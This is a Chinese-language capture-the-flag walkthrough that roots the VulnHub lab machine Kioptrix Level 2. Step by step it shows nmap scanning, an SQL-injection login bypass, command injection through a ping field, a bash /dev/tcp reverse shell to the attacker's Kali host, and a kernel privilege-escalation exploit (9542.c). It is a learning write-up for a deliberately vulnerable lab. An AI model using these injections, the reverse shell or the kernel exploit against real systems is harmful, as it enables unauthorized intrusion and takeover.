1. 靶机信息靶机名称Kioptrix Level 2下载来源VulnHub目标拿到 root 权限2. 环境准备攻击机Kali LinuxIP192.168.1.239靶机Kioptrix Level 2IP192.168.1.240网络模式NAT3. 信息收集3.1 找靶机 IPnmap -sn 192.168.1.0/243.2 端口扫描nmap -sV 192.168.1.240扫描结果端口 服务 版本22/tcp SSH OpenSSH80/tcp HTTP Apache httpd443/tcp HTTPS Apache httpd4. 漏洞发现访问 Web 服务发现登录框。尝试 SQL 注入绕过。5. 漏洞利用5.1 SQL注入绕过登录在登录框输入字段 输入用户名 admin密码 or 11成功进入后台。5.2 命令注入后台找到 ping 测试功能输入127.0.0.1;whoami返回 apache确认命令注入存在当前用户是 apache。5.3 反弹 shell在 Kali 中开启监听nc -lvnp 4444在靶机 ping 输入框执行127.0.0.1;bash -i /dev/tcp/192.168.1.239/4444 01成功拿到 shell。5.4 提权查看系统版本uname -r # 2.6.9-55.EL搜索对应提权漏洞searchsploit linux 2.6.9找到 9542.c复制到靶机编译执行gcc 9542.c -o exploit ./exploit6. 结果确认whoami # rootid # uid0(root) gid0(root) groups99(nobody)7. 总结项目 内容入口 80/tcp Web 登录框漏洞组合 SQL注入 → 命令注入 → 提权提权方式 内核漏洞 9542.c收获 组合漏洞的利用流程免责声明本文所有操作均在 VulnHub 靶机环境中完成仅用于网络安全学习与研究。